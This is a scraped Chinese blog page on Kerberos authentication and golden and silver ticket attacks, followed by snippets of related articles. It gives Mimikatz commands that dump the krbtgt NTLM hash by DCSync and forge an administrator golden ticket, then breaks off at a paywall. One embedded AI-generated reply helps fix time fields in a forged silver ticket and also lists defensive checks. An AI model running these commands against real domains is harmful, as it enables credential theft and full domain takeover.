kerberos协议&黄金票据白银票据

已于 2024-03-19 17:29:34 修改
阅读量517 收藏
点赞数 13
分类专栏: 内网渗透 文章标签: 安全
于 2024-03-19 17:07:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/codeZMJ/article/details/136847737
版权
本文介绍了内网渗透中如何使用Kerberos协议进行三方认证,包括通信过程图解,黄金票据和白银票据的应用,以及实战中如何利用Mimikatz工具生成、管理及执行非法操作,如获取NTLM哈希和添加域管理员账户。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、名词解释

在内网渗透过程中,一些需要三方认证的场合就需要使用kerberos协议。

kerberos的前身是cerberos(地狱三头犬),很形象生动地描述了三方认证的这个场景。

二、通信过程图解

三、黄金票据&白银票据使用前提

四、实战中常用工具

cs、mimikatz等

mimikatz使用方法:

1.在普通域用户中使用mimikatz生成黄金票据.kirbi文件并保存
mimikatz log "lsadump::dcsync /domain:xiusafe /user:krbtgt"//导出NTLM哈希
kerberos::golden /user:administrator /domain:xxx.com /sid:S-1-5-21-3818247987-2711466351-3365387365 /krbtgt:5eadd5a4f3a4861f8e887310db890002 /ticket:ticket.kirbi

/user:需要伪造的域管理员用户

/domain:域名称

/sid:SID值,(这里要是使用系统命令的话抓到是这样的SID,最后面的值代表着这个账号的SID

最低0.47元/天 解锁文章
红队内网攻防渗透:内网渗透之内网对抗:权限维持篇&内网AD域&Kerberos&黄金票据&白银票据&钻石票据&蓝宝石票据
HACKONE的博客
06-25 692
蓝宝石票据与钻石票据类似,票据不是伪造的,而是通过请求后获得的合法票据。在蓝宝石票据中,高权限用户PAC是通过S4U2Self+U2U获得的,然后该PAC会替换原来的PAC,由于该票据是完全合法元素组合起来的,所以是最难检测的票据白银票据是伪造的 Kerberos Ticket Grant Service (TGS) 票证,银票仅允许攻击者伪造特定服务的票证授予服务 (TGS) 票据白银票据所需的利用条件和黄金票据是相同的,只是秘钥换成了对应服务的机器账户 Hash(尾部带$的均为机器账户)
kerberos黄金票据白银票据
m0_73826804的博客
02-20 1451
白银票据:实际就是在抓取到了域控服务hash的情况下,在client端以一个普通域用户的身份生成TGS票据,并且是针对于某个机器上的某个服务的,生成的白银票据,只能访问指定的target机器中指定的服务。/sid:SID值,(这里要是使用系统命令的话抓到是这样的SID,最后面的值代表着这个账号的SID值,注意是去掉最后一个-后面的值!黄金票据:是直接抓取域控中ktbtgt账号的hash,来在client端生成一个TGT票据,那么该票据是针对所有机器的所有服务。白银票据就是伪造的ST,TGS返回的票据
kerberos认证原理_kerberos 协议初探
weixin_39757212的博客
12-03 315
kerberos原理一个客户端要访问某个服务时,先要到KDC去认证自己,并获得访问票据TGT 然后客户端再拿着这个访问票据到自己真实想要访问的服务去获得访问授权, 然后真实的进行访问在kerberos中,KDC有两部分组成:Authentication Server,用来认证用户,即验证用户存在,且密码正确Ticket-Granting Service,用来给客户端生成,可以访问客户端想...
kerberos 票据_域渗透 | 白银票据利用
weixin_33425215的博客
12-25 355
目录0x01 介绍0x02 白银票据利用0x01 介绍之前,我们已经详细说过Kerberos认证的流程,这次我们就来说说如何对其进行利用,这次主要说的是白银票据伪造(Silver Tickets)白银票据伪造利用的是Kerberos认证中的第三个步骤,在第三步的时候,client会带着ticket向server的某个服务进行请求,如果验证通过就可以访问server上的指定服务了,这里ticket的...
3.4 Golden Ticket黄金票据制作原理及利用方式
GloryGod的博客
08-24 491
krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成的,无法登录主机。
详细讲解kerberos认证全过程、黄金白银票据
qq_63217130的博客
08-18 3182
当TGS接收到请求之后,会检查自身是否存在客户端请求的服务,如果存在就会拿ktbtgt hash解密TGT(由于TGS是在DC上的,所有具有krbtgt的hash),解密到的信息中包含了login session key,别忘了客户端发过来的时间戳就是利用login session key加密的,此时就可以用其解密获取到时间戳了,然后验证时间戳。只要在TGT过期之前,可以直接请求TGS申请服务票据,而不用在每次访问服务的时候都向AS请求TGT,减少了与AS的通信,提高了系统的性能和效率。
Kerberos认证以及黄金票据白银票据的简单介绍
Reset
08-21 1245
Kerberos是一种网络身份认证的协议协议设计目的是通过使用秘钥加密技术为客户端/服务器应用程序提供强身份验证,保护服务器防止错误的用户使用,同时保护它的用户使用正确的服务器,即支持双向验证。Kerberos协议的整个认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意的读取、修改和插入数据。简而言之,Kerberos作为一种可信任的第三方认证服务,通过传统的密码技术(共享密钥)执行认证服务。
kerberos认证及黄金票据白银票据
qq_64951792的博客
05-22 1291
kerberos认证过程、黄金票据白银票据
Kerberos协议分析及域服务器配置以及黄金白银票据攻击复现
nopants的博客
06-16 1242
域服务器搭建以及用户加入域服务器及黄金白银票据攻击的验证复现
Kerberos 认证、黄金票据白银票据
weixin_51559599的博客
11-29 864
在实际环境中,有各种各样的服务都需要进行认证,需要频繁输入密码进行认证,不仅繁琐,而且频繁传输密码加大了出现中间人劫持等安全风险。服务器持有 TGS 颁发的票据后,携带票据访问相应的服务可获取响应的服务权限。AS(Authentication Service)所在的服务器存储了用户凭证,用户输入账户密码进行认证成功后,AS 向用户颁发。(身份票据),用户获取 TGT 后,凭借 TGT 即可向 TGS 申请各种服务票据(ST),用来获取各种服务的权限。白银票据就是伪造了 Kerberos 中的服务票据
黄金票据白银票据详解
故事讲予风听
06-22 6057
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
域渗透之(黄金票据利用)
cj_Hydra's Blog
02-13 3216
前言: 这里先介绍下Kerberos协议Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。 在Kerberos协议中主要是有三个角色的存在: 1:访问服务的Client(用户的机器客户端) 2:提供服务的Server(服务端) 3:KDC(Key Distribution Center)密钥分发中心其中K...
深入理解kerberos票据生命周期
帆了个帆的专栏
11-27 6544
查看当前服务器票据 [root@myrepo ~]# klist Ticket cache: FILE:/tmp/krb5cc_0 Default principal: bigdata@HADOOP.COM Valid starting Expires Service principal 2019-11-27T14:01:44 2019-11-28T14:...
kerberos协议
lovebomei的博客
04-04 2014
KDC 全称:key distributed center 作用:整个安全认证过程的票据生成管理服务,其中包含两个服务,AS和TGS AS 全称:authentication service 作用:为client生成TGT的服务 TGS 全称:ticket granting service 作用:为client生成某个服务的ticket AD 全称:account databas...
kerberos 票据_域渗透之黄金票据的实际利用
weixin_39861905的博客
12-25 548
先介绍下Kerberos协议Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。在Kerberos协议中主要是有三个角色的存在:1:访问服务的Client(用户的机器客户端)2:提供服务的Server(服务端)3:KDC(Key Distribution Center)密钥分发中心其中KDC服务默认会安装在一...
kerberos 票据_黄金票据(Golden Ticket)攻击
weixin_32252929的博客
12-25 2332
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 37 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更黄金票据在渗透测试过程中,攻击者往往会给自己留下多条进入内网的通道,如果我们忘记将 krbtgt 账号重置,攻击者就能快速重新拿到域控制器的权限。假设域内存在一个 SID 为 502 的域账号 krbtgt 。krbtgt 是 K...
三步轻松理解Kerberos协议
11-02 4万+
Kerberos是一种身份验证协议,它作为一种可信任的第三方认证服务,通过使用对称加密技术为客户端/服务器应用程序提供强身份验证。在域环境下,AD域使用Kerberos协议进行验证,熟悉...
黄金票据的制作与使用
热门推荐
Shanfenglan's blog
08-27 24万+
原理 黄金票据的原理就是用krbtgt的hash来伪造TGT的内容。更改里面的client参数与session key等。让TGS以为我就是那个我所声称的人,当然我一般会声称自己是administrator。第四步主要是来验证客户端的身份。 所谓的黄金票据其实就是kerberos认证的第二个阶段中的tgs的ticket也就是TGT。这个ticket相当于对请求端的一个身份认证的凭据,如果可以伪造这个ticket,那么就可以伪造任意身份,而黄金票据就是一个实现方式。 kerberos协议原理请参考:NTML认
Kerberos黄金票据详解
weixin_30642267的博客
12-27 1180
0x01黄金票据的原理和条件 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与域控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的。TGT仅用...
伪造的白银票据结束时间比开始时间早
最新发布
05-02
<think>好的,我现在需要帮助用户解决关于白银票据时间逻辑错误的问题。用户提到白银票据的结束时间早于开始时间,想知道错误的原因和解决方法。首先,我得回忆一下Kerberos认证中票据的结构和相关时间字段的作用。 根据引用[4],白银票据是伪造的ST(Service Ticket),而ST中包含时间戳和有效时间。在引用[2]中提到,Server收到ST后会解密并检查时间戳,通常有效时间为8小时。这说明时间字段的正确性非常重要。如果结束时间早于开始时间,Server在验证时会发现时间无效,拒绝票据。 接下来,我需要确定时间字段是如何生成的。白银票据伪造时,攻击者需要手动设置开始时间(starttime)和结束时间(endtime)。如果这两个时间设置错误,比如结束时间早于开始时间,就会导致票据无效。这可能是因为生成票据的工具配置错误,或者攻击者在手动设置时犯了错误。 解决方法方面,首先应该检查生成票据时的时间参数是否正确。确保结束时间晚于开始时间,并且符合Kerberos的时间策略(如通常不超过8小时)。此外,引用[3]提到可以通过修改注册表来增强验证,比如启用ValidateKdcPacSignature,这可能会影响票据的验证严格性。虽然用户的问题是关于伪造票据的时间错误,但作为防御方,加强验证机制可以检测此类异常票据。 另外,引用[5]提到关于降级攻击和弱加密算法的问题,虽然不直接相关,但提醒了加密算法和密钥强度的重要性。不过用户的问题集中在时间逻辑错误,所以暂时不需要深入这部分。 总结下来,错误的原因是时间参数设置错误,导致服务器验证失败。解决方法包括检查时间参数的正确性,使用正确的工具命令,以及确保时间差在允许范围内。同时,防御方可以启用更严格的验证机制来检测此类问题。</think>### 白银票据时间逻辑错误分析及解决方法 #### 错误原因 1. **票据时间字段矛盾** 白银票据(Service Ticket)包含以下关键时间字段: - `starttime`:票据生效时间 - `endtime`:票据过期时间 若伪造时设置`endtime < starttime`,会导致时间逻辑错误。根据Kerberos协议,服务端(Server)会解密票据后校验时间有效性[^2][^4]。 2. **服务器验证机制** 服务端通过以下步骤检测时间异常: ```plaintext 1. 解密ST获取Client-info和timestamp 2. 检查票据时间范围是否合法(starttime ≤ endtime) 3. 验证timestamp是否在有效期内(通常8小时)[^2] ``` #### 解决方法 1. **伪造端修复方法** - **时间参数修正** 确保生成票据时满足`starttime < endtime`,例如使用工具命令: ```bash kerberos::golden /user:Administrator /target:server.domain.com /service:cifs /starttime:2023-10-01T12:00 /endtime:2023-10-01T20:00 ``` - **时间同步要求** 伪造票据的时间误差需与域控(KDC)时间差小于5分钟。 2. **防御端检测方法** - **启用PAC签名验证** 修改注册表强制验证PAC签名,增强时间字段校验强度: ```reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters ValidateKdcPacSignature = 1 [^3] ``` - **监控异常票据** 通过SIEM工具检测`KRB_AP_ERR_BADTIME`或`KRB_AP_ERR_MODIFIED`事件日志[^2]。 #### 技术原理补充 白银票据绕过KDC直接伪造ST,但服务端仍会通过以下流程验证: ```mermaid graph LR A[Client发送ST] --> B{Server解密ST} B --> C[提取Session Key] C --> D[校验时间逻辑] D --> |失败| E[返回KRB_AP_ERR_BADTIME] D --> |成功| F[建立通信] ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值